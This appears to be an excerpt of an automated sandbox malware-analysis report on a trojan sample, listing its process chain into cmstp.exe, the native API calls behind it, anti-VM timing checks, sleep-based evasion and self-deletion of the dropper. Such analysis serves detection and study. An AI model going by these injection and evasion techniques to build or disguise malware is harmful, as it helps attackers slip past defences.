Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79A20 NtResumeThread,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79A10 NtQuerySection,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E797A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E7A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79760 NtOpenProcess,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E7A770 NtOpenThread,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E79B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E7A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FA8680 NtReadFile,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FA87B0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FA8700 NtClose,
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FA85D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA86FA NtReadFile,NtClose,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA867A NtReadFile,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 17_2_02FA85CA NtCreateFile,
          Source: 583475.exe, 00000000.00000002.741383689.0000000002CF3000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPe6.dll" vs 583475.exe
          Source: 583475.exe, 00000000.00000002.740499326.000000000094C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDemoProject2.exe: vs 583475.exe
          Source: 583475.exe, 00000000.00000002.747381692.0000000006850000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameSHCore1.dll0 vs 583475.exe
          Source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAddInProcess32.exeT vs 583475.exe
          Source: 583475.exe Binary or memory string: OriginalFilenameDemoProject2.exe: vs 583475.exe
          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
          Source: 583475.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\583475.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\583475.exe 'C:\Users\user\Desktop\583475.exe'
          Source: C:\Users\user\Desktop\583475.exe Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\583475.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\583475.exe.log
          Source: C:\Users\user\Desktop\583475.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: classification engine Classification label: mal100.troj.evad.winEXE@10/2@4/3
          Source: C:\Users\user\Desktop\583475.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: 583475.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
          Source: C:\Users\user\Desktop\583475.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\583475.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 583475.exe Static PE information: Virtual size of .text is bigger than: 0x100000
          Source: 583475.exe Static file information: File size 1085952 > 1048576
          Source: 583475.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 583475.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x108800
          Source: 583475.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: cmstp.pdbGCTL source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdb source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, cmstp.exe, 00000011.00000002.921765476.0000000004F2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: AddInProcess32.exe, 00000007.00000002.830902849.00000000017C0000.00000040.00020000.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: 583475.exe, 00000000.00000003.729306073.0000000006746000.00000004.00000001.sdmp, AddInProcess32.exe, 00000007.00000000.731556294.0000000000892000.00000002.00020000.sdmp, cmstp.exe, 00000011.00000002.920345538.0000000000CEC000.00000004.00000020.sdmp, AddInProcess32.exe.0.dr
          Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_00845EAE push ebx; retf
          Source: C:\Users\user\Desktop\583475.exe Code function: 0_2_067CEE70 push E8FFFFFFh; retf
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0041B87C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0041B812 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0041B81B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_00407A17 push cs; iretd
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_004152CE push edi; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_004152FD push edi; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_00415CCC push esp; iretd
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_00414DAE push esi; iretd
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_00414ED0 push ds; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0041B7C5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0136D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_04E8D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FA52FD push edi; ret
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FA52CE push edi; ret
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02F97A17 push cs; iretd
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FABBF4 push 00000009h; iretd
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FAB87C push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FAB81B push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FAB812 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FA4ED0 push ds; ret
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FAC699 push eax; retf
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FAB7C5 push eax; ret
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FA5CCC push esp; iretd
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 17_2_02FA4DAE push esi; iretd
          Source: 583475.exe, Fq2/r8Q.cs High entropy of concatenated method names: '.ctor', 'a8H', 'i8R', 'Tp4', 's7W', 'Gi4', 'n6D', 'Zg2', 'Rd8', 'a7R'
          Source: 583475.exe, Yt9/r5P.cs High entropy of concatenated method names: '.ctor', 'x5F', 'f0T7', 'Nk53', 'i6R4', 's8LZ', 'Ro40', 'Lx8s', 'j2SA', 'Kn62'
          Source: 583475.exe, Je1w/Ec5i.cs High entropy of concatenated method names: '.ctor', 'Cc0d', 'a5TL', 'Jz3c', 'p8KW', 'Jq19', 'Nn28', 'Pg1b', 'g2MY', 'w7KA'
          Source: 583475.exe, f4J/Cx3.cs High entropy of concatenated method names: '.ctor', 'Yq7', 'Ep4', 't8H', 'Zw4', 'g3J', 'j5W', 'z1M', 'a7M', 'Et3'
          Source: 583475.exe, m1DY/f0L8.cs High entropy of concatenated method names: '.ctor', 'Ym5r', 'Wa9g', 'm3W5', 'Py7i', 'Ak85', 'Wc18', 'An10', 'a6TP', 'Mo97'
          Source: 583475.exe, Qg54/Xy40.cs High entropy of concatenated method names: '.ctor', 'f5RG', 'Nq3a', 'Ta51', 'c4Q1', 't5A2', 'Qx0n', 'm6J1', 'z2SN', 'd4P1'
          Source: 583475.exe, f6L/i0X.cs High entropy of concatenated method names: '.ctor', 'n9X', 's0G', 'Gm4', 'Rf7', 'Ws0', 'Dn2', 'Wr6', 'o9W', 'Nb6'
          Source: 583475.exe, Lk6/Jg7.cs High entropy of concatenated method names: '.ctor', 'Sq0', 'Fb1', 'Wa5', 'Nz6', 'i6E', 'Tr4', 'Kd6', 'c5J', 'Qe1'
          Source: 583475.exe, Sq2/Hn1.cs High entropy of concatenated method names: '.ctor', 'Cz5', 'Qd4', 'Mj2', 'Cq2', 'Gw5', 'Zb8', 'Ez7', 's8M', 'Lz7'
          Source: 583475.exe, f1R0/p0M1.cs High entropy of concatenated method names: '.ctor', 'Jx71', 'Ci1s', 'Dm7f', 's5FA', 'Bb5j', 'Jg47', 'Ly51', 'Cm95', 'Bs8f'
          Source: C:\Users\user\Desktop\583475.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\583475.exe File opened: C:\Users\user\Desktop\583475.exe\:Zone.Identifier read attributes | delete
          Source: C:\Users\user\Desktop\583475.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000002F98604 second address: 0000000002F9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000002F9898E second address: 0000000002F98994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\583475.exe TID: 6416 Thread sleep time: -14757395258967632s >= -30000s
          Source: C:\Users\user\Desktop\583475.exe TID: 6416 Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\583475.exe TID: 4684 Thread sleep count: 502 > 30
          Source: C:\Users\user\Desktop\583475.exe TID: 4684 Thread sleep count: 9368 > 30
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\583475.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\583475.exe Window / User API: threadDelayed 502
          Source: C:\Users\user\Desktop\583475.exe Window / User API: threadDelayed 9368
          Source: C:\Users\user\Desktop\583475.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\583475.exe Thread delayed: delay time: 30000
          Source: 583475.exe Binary or memory string: IHGFSD
          Source: explorer.exe, 00000009.00000000.783820666.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.780685564.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.761406468.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000009.00000000.751150955.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000009.00000000.766952588.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: C:\Users\user\Desktop\583475.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0131AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01323D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0134513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0139A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01344D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01334120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01334120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01319100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0131B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0133C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0131C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01337D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01353D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0133B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01393540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01341DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01342990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0134FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0134A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0133C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01342581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01312D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0131B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0132D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_013DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01396DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_01396DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0132B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0134BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 7_2_0134002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01397016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01330050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01330050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0132849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01319080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01393884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01393884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01396CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0134E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01314F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_01314F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_0133F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 7_2_013E070D mov eax, dword ptr fs:[00000030h]
